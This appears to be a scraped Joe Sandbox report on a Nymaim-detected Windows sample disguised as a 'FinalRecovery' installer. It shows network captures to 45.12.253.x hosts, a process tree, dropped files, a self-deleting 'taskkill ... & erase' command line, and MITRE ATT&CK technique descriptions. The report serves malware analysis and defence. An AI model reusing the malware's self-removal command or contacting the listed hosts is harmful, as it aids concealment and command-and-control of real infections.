Jan 25, 2023 10:02:03.906924009 CET	80	49707	45.12.253.56	192.168.2.3
Jan 25, 2023 10:02:03.907047033 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:03.933878899 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:03.962369919 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:03.962474108 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:03.965511084 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:03.992350101 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:03.992405891 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:03.992479086 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.017834902 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.044780970 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.044833899 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.044881105 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.044903040 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.044934034 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.044971943 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045028925 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045042992 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045097113 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045144081 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045197964 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045212984 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045248032 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045277119 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045326948 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045353889 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045403004 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045423031 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045476913 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045490980 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045531988 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.072855949 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.072938919 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.072961092 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.072999001 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073029995 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073085070 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073100090 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073138952 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073163986 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073218107 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073234081 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073268890 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073296070 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073349953 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073364019 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073405027 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073425055 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073472023 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073508024 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073524952 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073553085 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073600054 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073626041 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073656082 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073683023 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073729992 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073750019 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073785067 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073812962 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073865891 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073879957 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073920012 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073941946 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073987961 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.074008942 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.074048042 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.074069977 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.074122906 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.074136019 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.074170113 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100656986 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100718021 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100743055 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100780964 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100815058 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100871086 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100887060 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100938082 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100951910 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100985050 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101016998 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101146936 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101169109 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101198912 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101242065 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101289034 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101310968 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101342916 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101373911 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101442099 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101459026 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101506948 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101553917 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101569891 CET	49708	80	192.168.2.3	45.12.253.72

HTTP Request Dependency Graph

45.12.253.56

45.12.253.72

45.12.253.75

Target ID:	0
Start time:	10:01:58
Start date:	25/01/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	1782938 bytes
MD5 hash:	14E09C7A5842688842F6C0BF61C17135
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: file.tmpPID: 6100, Parent PID: 5992

General

Target ID:	1
Start time:	10:01:58
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	712704 bytes
MD5 hash:	D76329B30DB65F61D55B20F36B56DA26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 2%, ReversingLabs
Reputation:	moderate

Analysis Process: finalrecovery.exePID: 6076, Parent PID: 6100

General

Target ID:	2
Start time:	10:01:59
Start date:	25/01/2023
Path:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
Imagebase:	0x400000
File size:	1327103 bytes
MD5 hash:	88A9155EB9D85157634ED38D128C877B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 6tohc1clzbcir.exePID: 1756, Parent PID: 6076

General

Target ID:	3
Start time:	10:02:03
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x170000
File size:	73728 bytes
MD5 hash:	3FB36CB0B7172E5298D2992D42984D06
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 60%, ReversingLabs
Reputation:	high

Analysis Process: cmd.exePID: 4488, Parent PID: 6076

General

Target ID:	15
Start time:	10:02:35
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5040, Parent PID: 4488

General

Target ID:	16
Start time:	10:02:35
Start date:	25/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskkill.exePID: 5968, Parent PID: 4488

General

Target ID:	17
Start time:	10:02:35
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "finalrecovery.exe" /f
Imagebase:	0x850000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Nymaim

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)

C:\Program Files (x86)\FgasoftFR\FinalRecovery\Readme.txt (copy)

C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\Config.xml (copy)

C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\is-K2TAS.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.chm (copy)

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-05LH6.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-587OJ.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-8DPO5.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmp

C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.dat

C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\stuk[1].htm

Windows Analysis Report
file.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre